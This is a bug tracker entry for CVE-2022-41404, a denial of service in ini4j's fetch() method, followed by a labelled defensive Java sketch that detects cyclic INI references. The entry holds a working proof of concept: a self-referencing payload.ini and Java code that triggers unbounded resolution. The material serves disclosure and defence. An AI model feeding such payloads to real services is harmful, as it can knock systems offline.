CVE-2022-41404: [ini4j] / Bugs / #56 The package org.ini4j before 0.5.4 are vulnerable to get value via the fetch() method in BasicProfile class, which may lead to DoS attacks.
An issue in the fetch() method in the BasicProfile class of org.ini4j before v0.5.4 allows attackers to cause a Denial of Service (DoS) via unspecified vectors.
#56 The package org.ini4j before 0.5.4 are vulnerable to get value via the fetch() method in BasicProfile class, which may lead to DoS attacks.
Status: open
Priority: 9
Updated: 2022-09-20
Created: 2022-09-20
Private: No
Test logic usable to reproduce the behaviour
payload:
----payload.ini
[dopey]
weight=${bashful/weight}
height=${doc/height}
[bashful]
weight=${dopey/weight}
height=${dopey/height}
[doc]
weight=49.5
height=87.7
----java poc
import java.io.File;
import java.io.FileReader;
import org.ini4j.Ini;

Ini ini = new Ini();
ini.load(new FileReader(new File("/Users/bingdian/IdeaProjects/soot/src/main/java/test.ini")));
ini.get("dopey").fetch("weight");
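Added example, not part of the ticket and not ini4j code: in the payload above, dopey/weight and bashful/weight refer to each other, so one defensive option is to check untrusted INI text for reference cycles before calling fetch(). The class name `IniCycleCheck`, its small parser and the simplified `${section/option}` pattern are assumptions made for this sketch and do not use the ini4j API.

```java
import java.util.*;
import java.util.regex.*;
public class IniCycleCheck {
    // Assumed, simplified reference syntax: ${section/option}, or ${option} within the same section.
    static final Pattern REF = Pattern.compile("\\$\\{(?:([^/}]+)/)?([^/}]+)\\}");
    // Parses "[section]" headers and "key=value" lines into a map keyed by "section/key".
    static Map<String, String> parse(String text) {
        Map<String, String> values = new LinkedHashMap<>();
        String section = "";
        for (String raw : text.split("\\R")) {
            String line = raw.trim();
            int eq = line.indexOf('=');
            if (line.startsWith("[") && line.endsWith("]")) section = line.substring(1, line.length() - 1).trim();
            else if (eq > 0 && !line.startsWith(";") && !line.startsWith("#"))
                values.put(section + "/" + line.substring(0, eq).trim(), line.substring(eq + 1).trim());
        }
        return values;
    }
    // Returns the members of the first reference cycle found, or an empty list if there is none.
    static List<String> findCycle(Map<String, String> values) {
        Set<String> done = new HashSet<>(); // keys already proven cycle-free
        for (String start : values.keySet()) {
            List<String> cycle = visit(start, values, new ArrayList<>(), done);
            if (!cycle.isEmpty()) return cycle;
        }
        return List.of();
    }
    // Depth-first walk along references; "path" holds the keys currently being resolved.
    static List<String> visit(String key, Map<String, String> values, List<String> path, Set<String> done) {
        int seen = path.indexOf(key);
        if (seen >= 0) return new ArrayList<>(path.subList(seen, path.size())); // key leads back to itself
        if (done.contains(key) || !values.containsKey(key)) return List.of();
        path.add(key);
        Matcher m = REF.matcher(values.get(key));
        while (m.find()) {
            String sec = m.group(1) != null ? m.group(1) : key.substring(0, key.lastIndexOf('/'));
            List<String> cycle = visit(sec + "/" + m.group(2), values, path, done);
            if (!cycle.isEmpty()) return cycle;
        }
        path.remove(path.size() - 1);
        done.add(key);
        return List.of();
    }
    public static void main(String[] args) {
        String payload = "[dopey]\nweight=${bashful/weight}\nheight=${doc/height}\n[bashful]\n"
                + "weight=${dopey/weight}\nheight=${dopey/height}\n[doc]\nweight=49.5\nheight=87.7\n";
        // Constructed input: the ticket's payload.ini embedded as a string.
        System.out.println(findCycle(parse(payload))); // a non-empty list means: reject before fetch()
    }
}
```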